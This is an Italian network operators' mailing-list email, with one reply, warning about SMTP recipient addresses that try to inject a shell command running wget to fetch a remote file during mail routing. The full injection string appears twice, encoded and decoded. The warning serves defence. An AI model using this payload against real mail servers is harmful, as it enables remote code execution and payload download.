<html><body><div style="font-family: arial, helvetica, sans-serif; font-size: 12pt; color: #000000"><div><style><!--
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-alt:Calibri;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-536870145 1073786111 1 0 415 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-520081665 -1073717157 41 0 66047 0;}
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";
mso-fareast-language:EN-US;}
a:link, span.MsoHyperlink
{mso-style-noshow:yes;
mso-style-priority:99;
color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:purple;
text-decoration:underline;
text-underline:single;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
mso-style-priority:99;
mso-style-link:"Balloon Text Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-fareast-font-family:Calibri;
mso-fareast-language:EN-US;}
span.EmailStyle17
{mso-style-type:personal-compose;
mso-style-noshow:yes;
mso-style-unhide:no;
mso-ansi-font-size:11.0pt;
mso-bidi-font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";
color:windowtext;}
span.BalloonTextChar
{mso-style-name:"Balloon Text Char";
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Balloon Text";
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.SpellE
{mso-style-name:"";
mso-spl-e:yes;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";
mso-fareast-language:EN-US;}
@page WordSection1
{size:612.0pt 792.0pt;
margin:70.85pt 2.0cm 2.0cm 2.0cm;
mso-header-margin:36.0pt;
mso-footer-margin:36.0pt;
mso-paper-source:0;}
div.WordSection1
{page:WordSection1;}
--></style></div><div><br></div><div><br></div><hr id="zwchr" data-marker="__DIVIDER__"><div data-marker="__HEADERS__"><blockquote style="border-left:2px solid #1010FF;margin-left:5px;padding-left:5px;color:#000;font-weight:normal;font-style:normal;text-decoration:none;font-family:Helvetica,Arial,sans-serif;font-size:12pt;"><b>Da: </b>"Brian Turnbow via itnog" <itnog@lists.itnog.it><br><b>A: </b>itnog@lists.itnog.it<br><b>Inviato: </b>Giovedì, 27 giugno 2019 19:10:09<br><b>Oggetto: </b>[ITNOG] tentativi sul server di posta<br></blockquote></div><div data-marker="__QUOTED_TEXT__"><blockquote style="border-left:2px solid #1010FF;margin-left:5px;padding-left:5px;color:#000;font-weight:normal;font-style:normal;text-decoration:none;font-family:Helvetica,Arial,sans-serif;font-size:12pt;"><div class="WordSection1"><p class="MsoNormal">Ciao a tutti</p><p class="MsoNormal"> </p><p class="MsoNormal">Volevo avvisarvi che abbiamo nottato diversi email in arriva sui ns server di posta di un cosa che non avevo visto prima</p><p class="MsoNormal">Sfrutta <span class="SpellE">subaddressing</span> nel <span class="SpellE">user</span> part del email cosi</p><p class="MsoNormal"> </p><p class="MsoNormal"><span lang="EN-US" style="mso-ansi-language:EN-US">RCPT TO:<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20192.168.0.1\x2fstfinracu\x22}}@mydomain.it></span></p><p class="MsoNormal"><span class="SpellE"><span lang="EN-US" style="mso-ansi-language:EN-US">ovvero</span></span></p><p class="MsoNormal"><span lang="EN-US" style="mso-ansi-language:EN-US"><root+${run{/bin/<span class="SpellE">sh</span> -c "<span class="SpellE">wget</span> 192.168.0.1/<span class="SpellE">stfinracu</span>"}}@mydomain.it></span></p><p class="MsoNormal"> </p><p class="MsoNormal">Quindi tenta di lanciare un <span class="SpellE">wget</span>durante il <span class="SpellE">routing</span> del utente.</p><p class="MsoNormal">Nostro non lo esegue, e l’<span class="SpellE">ip</span> pubico non ci risponde e non so esattamente cosa tenta di fare, ma magari fate qualche controllo sui vs server per capire se siete vulnerabile.</p><p class="MsoNormal"> </p></div></blockquote><div>Ciao Brian,</div><div><br data-mce-bogus="1"></div><div>forse un modo fantasioso di usare questo?<br><br><a href="https://www.cvedetails.com/cve/CVE-2019-5953/">https://www.cvedetails.com/cve/CVE-2019-5953/</a><br></div><div><br>A presto<br><br>Gianluca</div></div></div></body></html>